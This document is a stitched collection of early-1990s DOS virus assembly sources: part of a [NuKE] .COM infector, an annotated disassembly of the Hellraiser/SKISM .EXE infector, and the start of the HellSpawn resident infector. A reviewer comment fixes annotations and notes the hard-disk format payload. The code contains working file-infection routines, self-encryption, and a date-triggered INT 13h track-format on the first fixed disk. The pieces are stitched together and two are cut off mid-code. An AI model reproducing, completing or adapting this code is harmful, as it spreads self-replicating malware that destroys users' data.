jmp not_yet ; Nop, let get outta here
strt00:
push sp ; More BS... for the
pushf ; Bytes...
push bp ;
push di ; It looks good in hex :)
push dx ; Not! Show me some fucked
; code please!!!
mov ah,09h ; BIOS display char. function
mov dx, offset data01 ; whoop there it is...
int 21h
pop dx ; This is just for kicks
pop di ; & giggles...
pop bp ; Something tells
popf ; me to do this...
pop sp ; just for laughs
lea si,[di + data00] ; SI points to shit
call show_this
mov cx,45h ; number of flashes
flash:
xor ax,ax ; Clear Register
mov al,0FFh ; Load binary flags
mov dx,060h ; Port number
out 060h,al ; Toggle Keyboard lights
dec cx ; lets do it one less time
nop ; good for what ails you.
jcxz getout ; ok, I'm thru.
nop
loop flash ; nah, I want to do it again
getout: cli ; Clear the interrupt flag
hlt ; HALT the computer
jmp $ ; Why not??
not_yet: xor ax,ax ; Clear Register
mov al,0FFh ; Load binary flags
mov dx,060h ; Port number
out 060h,al ; Toggle Keyboard lights
dec cx ; lets do it one less time
nop ; good for what ails you.
jcxz com_end ; ok, I'm thru.
loop not_yet ; nah, I want to do it again
com_end: pop dx ; DX holds DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; DUMP out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
disvsafe proc near ; Well, Now this
mov ax,05FEh ; is abusive.
mov dx,0A6BAh ;
not ax ;
not dx ;
int 16h ; Pretty Stupid, Huh?
mov ax,05FDh ; Ha... You're looking
mov dx,0A6BAh ; at it aren't you??
mov bx,0000h ;
not ax ;
not dx ; Yep, Lamest...
int 16h ;
ret ;
disvsafe endp
search_me proc near
mov bx,di ; BX points to the virus
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,135 ; Allocate 135 bytes on stack
mov byte ptr [bp - 135],'\' ; Start with a backslash
mov ah,01h ; Clean code, Clean code...
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 134] ; SI points to 64-byte buffer
int 021h
call scan_path ; Start scanning
scanpath_loop: cmp word ptr [bx + path_ad],0 ; Was the search unsucces
je found_none ; If so then we're done
call found_sub ; Otherwise copy the subdirectory
mov ax,cs ; AX holds the code segment
mov ds,ax ; Set the data and extra
mov es,ax ; segments to the code segment
xor al,al ; Zero AL
stosb ; NULL-terminate the directory
xor ah,ah ; Clear register
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 70] ; DX points to the directory
int 021h
lea dx,[bx + com_mask] ; DX points to '*.COM'
push di
mov di,bx
call find_me ; Try to infect a .COM file
mov bx,di
pop di
jnc found_none ; If successful the exit
jmp short scanpath_loop ; Keep checking the PATH
found_none: mov ah,03Bh ; DOS change directory function
lea dx,[bp - 135] ; DX points to old directory
int 021h
cmp word ptr [bx + path_ad],0 ; Did we run out of direc
jne try_again ; If not then exit
stc ; Set the carry flag for failure
try_again: mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
com_mask db '*.COM',0 ; Mask for all .COM files
search_me endp
scan_path proc near
mov es,word ptr cs:[002Ch] ; ES holds the enviroment s
xor di,di ; DI holds the starting offset
find_path: lea si,[bx + path_string] ; SI points to 'PATH='
lodsb ; Load the 'P' into AL
xor cl, cl ; Clean those registers
mov cx,08000h ; Check the first 32767 bytes
repne scasb ; Search until the byte is found
mov cx,4 ; Check the next four bytes
check_next_4: lodsb ; Load the next letter of 'PATH='
scasb ; Compare it to the environment
jne find_path ; If there not equal try again
loop check_next_4 ; Otherwise keep checking
mov word ptr [bx + path_ad],di ; Save the PATH add
mov word ptr [bx + path_ad + 2],es ; Save the PATH's s
ret ; Return to caller
path_string db 'PATH=' ; The PATH string to search for
path_ad dd ? ; Holds the PATH's address
scan_path endp
found_sub proc near
lds si,dword ptr [bx + path_ad] ; DS:SI points to P
lea di,[bp - 70] ; DI points to the work buffer
push cs ; Transfer CS into ES for
pop es ; byte transfer
move_sub: lodsb ; Load the next byte into AL
cmp al,';' ; Have we reached a separator?
je moved_one ; If so we're done copying
or al,al ; Are we finished with the PATH?
je moved_last_one ; If so get out of here
stosb ; Store the byte at ES:DI
jmp short move_sub ; Keep transfering characters
; keep it up
moved_last_one: mov si,0000h ; Zero SI to signal complet
moved_one: mov word ptr es:[bx + path_ad],si ; Store SI in the pa
ret ; Return to caller
found_sub endp
find_me proc near
push bp ; Save BP
mov ah,0FFh ; Clean code
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,0FFh ; Clean code
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
xchg ax,bx ; Lets do the Time
xchg ax,bx ; warp again
int 021h
mov ah,0FFh ; Clean code just for fun
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc found_out ; Exit if no files found
call infect_file ; Infect the file!
jnc found_out ; Exit if no error
mov ah,0FFh ; Clean code
mov ah,04Fh ; DOS find next file function
jmp short find_a_file; Try finding another file
found_out: mov sp,bp ; Restore old stack frame
mov ah,0FFh ; Clean code
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_me endp ; Are you reading this
; nonsense?
show_this proc near
mov ah,0Eh ; BIOS display
loop_this: lodsb ; Load next char. into AL
or al,al ; Is the character a null?
je show_ended ; Yep, exit
int 010h ; BIOS video interrupt
jmp short loop_this ; Do next character
show_ended:
ret ; Return to caller
show_this endp
data00 db ' I'm not working until Howard Stern is done @ 11:00 am
db ' Bow down before the King ',13,12
db ' Smile ... [NuKE] loves you',13,10,13,10,07,13,0
data01 db ' I'm not working until Howard Stern is done @ 11:00 am
infect_file proc near
mov ah,0FFh ; Clean code, yeaah suuure
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe we_be_good ; If it's small enough continue
jmp infection_done ; Otherwise exit
we_be_good: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ah,0FFh ; Clean code
xor ah,ah ; Clean the registers
mov ah,0FFh ; Clean code again
xor ah,ah ; Clean the registers
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jum
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file
add ax,finish - start ; Re-adjust to make the jum
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,0BCFEh ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
not ax
int 021h
mov ax,0C2FDh ; DOS open file function, r/w
not ax
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
xor ah,ah ; Clear Registers
xor ax,ax
mov ax,0BDFDh ; DOS file seek function, EOF
not ax
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
mov ah,69h
mov ah,040h ; DOS write to file function
mov cx,finish - start; CX holds virus length
lea dx,[di + start] ; DX points to start of virus
int 021h
mov ah,69h
xor ax,ax
mov ax,0A8FEh ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
not ax
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,0BCFEh ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
not ax
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if fa
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
get_hour proc near
mov ah,02Ch ; DOS get time function
int 021h
mov al,ch ; Copy hour into AL
cbw ; Sign-extend AL into AX
ret ; Return to caller
get_hour endp
note db ' 1234567890!@#$%^&*()ascii '
db ' (c) Ba Ba Stupid... '
db ' Remember Studderin' John '
db ' Robin, I love You! '
db ' Long Live [NuKE] '
db 12h,13h,17h,19h
db ' Georgia needs Howard Stern'
finish label near
code ends
end main
+412
@@ -0,0 +1,412 @@
;NAME: HR.DEC
;FILE SIZE: 0062Ch - 1580d
;START (CS:IP): 00100h
;CODE END: 0072Ch
;CODE ORIGIN: 00100h
;DATE: Sun Aug 02 17:20:02 1992
CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING
P00100 PROC
ORG 0100h
START: JMP Short BEGIN
;---------------------------------------------------
NOP
ENCRKEY:DB 0Ch,32h ; 32h may not be needed... ;OR AH,32
BEGIN: CALL CRYPT ; Decrypt the virus
JMP H00520
;---------------------------------------------------
CRYPT: PUSH CX
MOV SI,OFFSET MESSAGE
MOV DI,SI
MOV CX,0766h
CLD
LOOP_1: LODSW
XOR AX,DS:ENCRKEY ;DS may not be needed
STOSW
DEC CX
JNZ LOOP_1
POP CX
RET
;---------------------------------------------------
INFECT: MOV DX,0100h ;Offset to begin at
MOV BX,DS:[HANDLE] ;BX=File handle
PUSH BX ;I don't know why, BX doesn't change.
MOV CX,062Ch ;CX=number of bytes to write
CALL CRYPT ;Encrypt before saving
POP BX ;I don't know why, BX doesn't change.
MOV AX,4000h ;AH = 40h, write to file.
INT 21h ;Infect the file.
PUSH BX ;Again, BX never changes.
CALL CRYPT ; . . . . . . . . .
POP BX
RET ;RET_Near
;---------------------------------------------------
; This is the big, red, block letters that shows when it goes off.
MESSAGE:
DB 0Fh,10h,18h,19h,1Fh,"I'll be back..."
DB 18h,18h,14h,20h,20h,00Ch,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h
DB 20h,0DEh,10h,19h,05h,14h,19h,05h,0DEh,10h,20h,20h,14h,19h,06h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,18h,20h,20h,0DEh,10h
DB 20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,20h,20h
DB 0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,06h,16h,0DEh
DB 10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h
DB 05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,18h,20h
DB 20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h
DB 04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,20h
DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h
DB 20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h
DB 20h,16h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h
DB 0DEh,10h,20h,20h,14h,20h,20h,16h,0DEh,18h,14h,19h,05h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh
DB 10h,19h,05h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h
DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h
DB 19h,05h,16h,0DEh,10h,20h,14h,19h,04h,0DEh,10h,20h,20h,14h,20h,20h
DB 0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh,10h,20h,14h,20h,20h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h
DB 04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,04h,0DEh,10h,19h,02h,14h
DB 19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,16h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,19h,04h,16h,0DEh,18h,14h
DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h
DB 20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h
DB 0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h
DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h
DB 14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h
DB 14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,10h,19h,03h,14h
DB 20h,10h,19h,02h,14h,20h,20h,10h,19h,05h,14h,20h,20h,10h,19h,06h,14h,20h
DB 20h,10h,20h,20h,14h,20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h
DB 02h,14h,20h,10h,19h,02h,14h,20h,20h,10h,20h,20h,14h,20h,10h,19h
DB 03h,14h,20h,20h,10h,19h,06h,14h,20h,20h,10h,19h,04h,14h,20h
DB 10h,19h,02h,14h,20h,20h,18h,20h,10h,19h,03h,14h,20h,10h,19h,02h
DB 14h,20h,10h,19h,06h,14h,20h,10h,19h,07h,14h,20h,10h,19h,02h,14h
DB 20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,06h,14h,20h
DB 10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,07h,14h,20h,10h,19h
DB 05h,14h,20h,10h,19h,03h,14h,20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h
DB 07h,14h,20h,10h,19h,02h,14h,20h,10h,19h,07h,14h,20h,10h,19h,06h
DB 14h,20h,10h,19h,07h,14h,20h,10h,19h,07h,14h,20h,10h,19h,00Ah,14h
DB 20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h,07h,14h,20h,10h,19h,13h,14h
DB 20h,10h,19h,10h,14h,20h,18h,10h,19h,40h,14h,20h,18h,18h,2Ah
;---------------------------------------------------
DB 00 ;00454
DB "*.EXE" ;00455
DB 00h,"\",00h,03h ;0045A
DB 8 DUP("?") ;0045E 3F
DB " " ;00466 202020
;---------------------------------------------------
;This area is perplexing. Doesn't seem to be ever called, nor read from.
ADC AX,[BP+DI] ;00469 1303 __
ADD [BX+SI],AL ;0046B 0000 __
ADD [BP+SI],CH ;0046D 002A _*
SHR BP,1 ;0046F D1ED __
DEC DX ;00471 4A J
ADC DL,DS:[0E278h] ;00472 121678E2 __x_
PUSH SS ;00476 16 _
ADD [BX+SI],AL ;00477 0000 __
ADD [BX+SI],AL ;00479 0000 __
;---------------------------------------------------
DB "ARMOR" ;0047B 41524D4F52
DB 00h ;00480
DB " " ;00481 2020
DB 00h ;00483
DB 00h ;00484
DB 00h ;00485
DB 00h ;00486
DB 00h ;00487
DB 03h ;00488
DB 8 DUP("?") ;00489 3F
DB "EXE" ;00491 455845
DB 07h ;00494
DB 04h ;00495
DB 00h ;00496
DB "3" ;00497 33
DB 1Fh ;00498
DB "*" ;00499 2A
DB 0D1h ;0049A
DB 0EDh ;0049B
DB "J " ;0049C 4A20
DB 02h ;0049E
DB "x" ;0049F 78
DB 0F0h ;004A0
DB 16h ;004A1
DB 02h ;004A2
DB 00h ;004A3
DB 00h ;004A4
DB 00h ;004A5
DB "SAMPLE3.EXE" ;004A6 53414D504C4533
DB 00h ;004B1
DB 00h ;004B2
DB 9Eh ;004B3
DB "-]" ;004B4 2D5D
DB 04h ;004B6
DB 88h ;004B7
DB 04h ;004B8
DB 9Eh ;004B9
DB "-" ;004BA 2D
DB 00h ;004BB
DB "ARMOR" ;004BC 41524D4F52
DB 00h ;004C1
DB 58 DUP(00h) ;004C2
HANDLE: DB 05h ;004FC
DB 00h ;004FD
DB 02h ;004FE
DB "x" ;004FF 78
DB 0F0h ;00500
DB 16h ;00501
DB " " ;00502 20
DB 00h ;00503
DB 0CDh ;00504
DB " " ;00505 20
DB 00h ;00506
DB 00h ;00507
DB "Written by Dennis Yelle" ;00508 5772697474656E
DB 00h ;0051F
;---------------------------------------------------
; Create new encryption key
H00520: MOV AX,3000h ;00520 B80030 __0
INT 21h ;2-DOS_Ver ;00523 CD21 _!
CMP AL,02h ;00525 3C02 <_
JB H0056B ;00527 7242 rB
MOV AH,2Ch ;00529 B42C _,
INT 21h ;1-Get_Time ;0052B CD21 _!
MOV DS:[0103h],DX ;0052D 89160301 ____
; Check to see if it's the last Friday in month, if so, go off.
H00531: MOV AH,2Ah ;00531 B42A _*
INT 21h ;1-Get_Date ;00533 CD21 _!
CMP DL,19h ;00535 80FA19 ___
JL H0053E ;00538 7C04 |_
CMP AL,05h ;0053A 3C05 <_
JZ H00541 ;0053C 7403 t_
H0053E: JMP H005F2 ;0053E E9B100 ___
;---------------------------------------------------
; GO OFF!
H00541: MOV AH,0Fh ;00541 B40F
INT 10h ;Get current vid mode ;00543 CD10
CMP AL,07h ;00545 3C07
JZ H00568 ;If mono, format ;00547 741F
MOV AX,0003h ;80x25 16 color ;00549 B80300
INT 10h ;Set video mode ;0054C CD10
MOV AH,01h ;0054E B401
MOV CX,0808h ;No cursor ;00550 B90808
INT 10h ;Set cursor size ;00553 CD10
MOV SI,013Ah ;00555 BE3A01
MOV AX,0B800h ;Video segment ;00558 B800B8
MOV ES,AX ;ES_Chg ;0055B 8EC0
MOV DI,0000h ; ;0055D BF0000
MOV CX,0319h ;00560 B91903
CALL H0057E ; . . . . . . . . . ;00563 E81800
JMP Short H00531 ;00566 EBC9
;---------------------------------------------------
H00568: JMP Short H005DC ;00568 EB72 _r
;---------------------------------------------------
NOP ;0056A 90 _
H0056B: JMP H0061E ;0056B E9B000 ___
;---------------------------------------------------
DB " -=PHALCON=- " ;0056E 20202D3D504841
DB 00h ;0057D
;---------------------------------------------------
; Display message... TheDraw algorythm for unpacking image.
H0057E: JCXZ H005DB ;Jumps to a ret ;0057E E35B _[
MOV DX,DI ;00580 8BD7 __
XOR AX,AX ;00582 33C0 3_
CLD ;00584 FC _
H00585: LODSB ;Take a byte ;00585 AC _
CMP AL,20h ;If it's <space ;00586 3C20 <
JB H0058F ;Jump ;00588 7205 r_
STOSW ;Move to screen ;0058A AB _
H0058B: LOOP H00585 ;0058B E2F8 __
JMP Short H005DB ;0058D EB4C _L
;---------------------------------------------------
H0058F: CMP AL,10h ;If it's not<10h ;0058F 3C10 <_
JNB H0059A ;Jump ;00591 7307 s_
AND AH,0F0h ;00593 80E4F0 ___
OR AH,AL ;00596 0AE0 __
JMP Short H0058B ;00598 EBF1 __
;---------------------------------------------------
H0059A: CMP AL,18h ;0059A 3C18 <_
JZ H005B1 ;0059C 7413 t_
JNB H005B9 ;0059E 7319 s_
SUB AL,10h ;005A0 2C10 ,_
ADD AL,AL ;005A2 02C0 __
ADD AL,AL ;005A4 02C0 __
ADD AL,AL ;005A6 02C0 __
ADD AL,AL ;005A8 02C0 __
AND AH,8Fh ;005AA 80E48F ___
OR AH,AL ;005AD 0AE0 __
JMP Short H0058B ;005AF EBDA __
;---------------------------------------------------
H005B1: ADD DX,00A0h ;005B1 81C2A000 ____
MOV DI,DX ;005B5 8BFA __
JMP Short H0058B ;005B7 EBD2 __
;---------------------------------------------------
H005B9: CMP AL,1Bh ;005B9 3C1B <_
JB H005C4 ;005BB 7207 r_
JNZ H0058B ;005BD 75CC u_
XOR AH,80h ;005BF 80F480 ___
JMP Short H0058B ;005C2 EBC7 __
;---------------------------------------------------
H005C4: CMP AL,19h ;005C4 3C19 <_
MOV BX,CX ;005C6 8BD9 __
LODSB ;005C8 AC _
MOV CL,AL ;005C9 8AC8 __
MOV AL,20h ;005CB B020 _
JZ H005D1 ;005CD 7402 t_
LODSB ;005CF AC _
DEC BX ;005D0 4B K
H005D1: XOR CH,CH ;005D1 32ED 2_
INC CX ;005D3 41 A
REPZ STOSW ;005D4 F3AB __
MOV CX,BX ;005D6 8BCB __
DEC CX ;005D8 49 I
LOOPNZ H00585 ;005D9 E0AA __
H005DB: RET ;RET_Near ;005DB C3 _
;End of display message procedure
;---------------------------------------------------
H005DC: MOV AH,15h ;005DC B415 __
MOV DL,80h ;005DE B280 __
INT 13h ;BAT-Dsk_Type ;005E0 CD13 __
CMP AH,03h ;005E2 80FC03 ___
JNZ H005F2 ;005E5 750B u_
MOV AX,0504h ;005E7 B80405 ___
MOV CX,DS:[0103h] ;005EA 8B0E0301 ____
MOV DL,80h ;005EE B280 __
INT 13h ;B-Fmt_FD_Trk ;005F0 CD13 __
H005F2: MOV DX,045Dh ;005F2 BA5D04 _]_
MOV AH,1Ah ;005F5 B41A __
INT 21h ;1-Set_DTA ;005F7 CD21 _!
MOV AH,19h ;005F9 B419 __
INT 21h ;1-Get_Cur_Dr ;005FB CD21 _!
MOV DL,AL ;005FD 8AD0 __
INC DL ;005FF FEC2 __
MOV AH,47h ;00601 B447 _G
MOV SI,04BCh ;00603 BEBC04 ___
INT 21h ;2-Cur_Dir ;00606 CD21 _!
MOV DX,045Bh ;00608 BA5B04 _[_
MOV AH,3Bh ;0060B B43B _;
INT 21h ;2-Chg_Dir ;0060D CD21 _!
MOV CX,0013h ;0060F B91300 ___
MOV DX,0453h ;00612 BA5304 _S_
MOV AH,4Eh ;00615 B44E _N
INT 21h ;2-Srch_1st_Fl_Hdl ;00617 CD21 _!
CMP AX,0012h ;00619 3D1200 =__
JNZ H00621 ;0061C 7503 u_
H0061E: JMP Short H00671 ;0061E EB51 _Q
;---------------------------------------------------
NOP ;00620 90 _
H00621: MOV AH,4Fh ;00621 B44F _O
INT 21h ;2-Srch_Nxt_Fl_Hdl ;00623 CD21 _!
CMP AX,0012h ;00625 3D1200 =__
JZ H00671 ;00628 7447 tG
MOV DX,047Bh ;0062A BA7B04 _{_
MOV AH,3Bh ;0062D B43B _;
INT 21h ;2-Chg_Dir ;0062F CD21 _!
MOV AH,2Fh ;00631 B42F _/
INT 21h ;2-Get_DTA ;00633 CD21 _!
MOV DS:[04B3h],ES ;00635 8C06B304 ____
MOV DS:[04B5h],BX ;00639 891EB504 ____
MOV DX,0488h ;0063D BA8804 ___
MOV AH,1Ah ;00640 B41A __
INT 21h ;1-Set_DTA ;00642 CD21 _!
MOV CX,0007h ;00644 B90700 ___
MOV DX,0455h ;00647 BA5504 _U_
MOV AH,4Eh ;0064A B44E _N
INT 21h ;2-Srch_1st_Fl_Hdl ;0064C CD21 _!
CMP AX,0012h ;0064E 3D1200 =__
JNZ H00674 ;00651 7521 u!
H00653: MOV AH,4Fh ;00653 B44F _O
INT 21h ;2-Srch_Nxt_Fl_Hdl ;00655 CD21 _!
CMP AX,0012h ;00657 3D1200 =__
JNZ H00674 ;0065A 7518 u_
MOV DX,045Bh ;0065C BA5B04 _[_
MOV AH,3Bh ;0065F B43B _;
INT 21h ;2-Chg_Dir ;00661 CD21 _!
MOV AH,1Ah ;00663 B41A __
MOV DS,DS:[04B3h] ;DS_Chg ;00665 8E1EB304 ____
MOV DX,DS:[04B5h] ;00669 8B16B504 ____
INT 21h ;1-Set_DTA ;0066D CD21 _!
JMP Short H00621 ;0066F EBB0 __
;---------------------------------------------------
H00671: JMP Short H006EC ;00671 EB79 _y
;---------------------------------------------------
NOP ;00673 90 _
H00674: MOV AH,2Fh ;00674 B42F _/
INT 21h ;2-Get_DTA ;00676 CD21 _!
MOV DS:[04B9h],ES ;00678 8C06B904 ____
MOV DS:[04B7h],BX ;0067C 891EB704 ____
MOV DX,04A6h ;00680 BAA604 ___
MOV BX,0488h ;00683 BB8804 ___
MOV AX,[BX+18h] ;00686 8B4718 _G_
MOV DS:[0500h],AX ;00689 A30005 ___
MOV AX,[BX+16h] ;0068C 8B4716 _G_
MOV DS:[04FEh],AX ;0068F A3FE04 ___
MOV AX,[BX+15h] ;00692 8B4715 _G_
MOV AX,4300h ;00695 B80043 __C
INT 21h ;2-Fl_Hdl_Attr ;00698 CD21 _!
MOV DS:[0502h],CX ;0069A 890E0205 ____
MOV AX,4301h ;0069E B80143 __C
XOR CX,CX ;006A1 33C9 3_
INT 21h ;1-TERM_norm:21h-00h;006A3 CD21 _!
;---------------------------------------------------
MOV AX,3D00h ;006A5 B8003D __=
INT 21h ;2-Open_Fl_Hdl ;006A8 CD21 _!
JB H006CF ;006AA 7223 r#
MOV DS:[HANDLE],AX ;006AC A3FC04 ___
MOV AH,3Fh ;006AF B43F _?
MOV BX,DS:[HANDLE] ;006B1 8B1EFC04 ____
MOV CX,0002h ;006B5 B90200 ___
MOV DX,0504h ;006B8 BA0405 ___
INT 21h ;2-Rd_Fl_Hdl ;006BB CD21 _!
MOV AH,3Eh ;006BD B43E _>
MOV BX,DS:[HANDLE] ;006BF 8B1EFC04 ____
INT 21h ;2-Close_Fl_Hdl ;006C3 CD21 _!
MOV BX,DS:[0504h] ;006C5 8B1E0405 ____
CMP BX,03EBh ;006C9 81FBEB03 ____
JNZ H006DE ;006CD 750F u_
H006CF: MOV AH,1Ah ;006CF B41A __
MOV DS,DS:[04B9h] ;DS_Chg ;006D1 8E1EB904 ____
MOV DX,DS:[04B7h] ;006D5 8B16B704 ____
INT 21h ;1-Set_DTA ;006D9 CD21 _!
JMP H00653 ;006DB E975FF _u_
;---------------------------------------------------
H006DE: MOV DX,04A6h ;006DE BAA604 ___
MOV AX,3D02h ;006E1 B8023D __=
INT 21h ;2-Open_Fl_Hdl ;006E4 CD21 _!
MOV DS:[HANDLE],AX ;006E6 A3FC04 ___
CALL INFECT ; . . . . . . . . . ;006E9 E834FA _4_
H006EC: MOV AX,5701h ;006EC B80157 __W
MOV BX,DS:[HANDLE] ;006EF 8B1EFC04 ____
MOV CX,DS:[04FEh] ;006F3 8B0EFE04 ____
MOV DX,DS:[0500h] ;006F7 8B160005 ____
INT 21h ;2-Fl_Hdl_Date_Time ;006FB CD21 _!
MOV AX,4301h ;006FD B80143 __C
MOV CX,DS:[0502h] ;00700 8B0E0205 ____
MOV DX,04A6h ;00704 BAA604 ___
INT 21h ;2-Fl_Hdl_Attr ;00707 CD21 _!
MOV AH,3Bh ;00709 B43B _;
MOV DX,045Bh ;0070B BA5B04 _[_
INT 21h ;2-Chg_Dir ;0070E CD21 _!
MOV AH,3Bh ;00710 B43B _;
MOV DX,04BCh ;00712 BABC04 ___
INT 21h ;2-Chg_Dir ;00715 CD21 _!
MOV AX,4C00h ;00717 B8004C __L
INT 21h ;2-TERM_w_Ret_Cd ;0071A CD21 _!
;---------------------------------------------------
DB "Hellraiser/SKISM" ;0071C 48656C6C726169
;---------------------------------------------------
P00100 ENDP
CODE ENDS
END H00100
;-------------------------------------------------------------------------------
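Review bot: The auto-generated annotation on the `INT 21h` at offset 006A3 reads `1-TERM_norm:21h-00h`, which mislabels the call. It follows `MOV AX,4301h` / `XOR CX,CX`, so it is the set-file-attributes function with CX=0, clearing the target's attributes before the file is reopened for writing. I would change the comment to `;2-Fl_Hdl_Attr (set, CX=0)` so it matches the identical call annotated at 00707. The `;B-Fmt_FD_Trk` label at 005F0 is misleading in the same way: the code loads `DL,80h` and only gets there when the AH=15h disk-type query returns 03h, so the format-track request addresses the first fixed disk, not a floppy. A comment saying so would help anyone assessing the payload's impact from this listing.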
@@ -0,0 +1,580 @@
; HellSpawn Virus (c) 1993 by Stormbringer
;
;
; Ò Stormbringer
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄ
; Ð
.model tiny
.radix 16
.code
org 100
start:
jmp EntryPoint
FindZero:
lodsb
or al,al
jne FindZero
cmp ds:[si-4],'XE'
je InfectOnOpen
cmp ds:[si-4],'OC'
jne Doneopen
OpenRequestedFile:
mov ax,3d00
pushf
call dword ptr cs:[IP_21]
xchg bx,ax
xor cx,cx
xor dx,dx
mov ax,4202
call FakeInt21
cmp ax,endmain-start
jne CloseUp
pop di si ds es dx cx bx ax
stc
retf 002
CloseUp:
jc CloseUp
mov ah,3e
call FakeInt21
doneOPen:
pop di si ds es dx cx bx ax
jmp Go21
InfectOnOpen:
pop di si ds es dx cx bx ax
jmp Execute
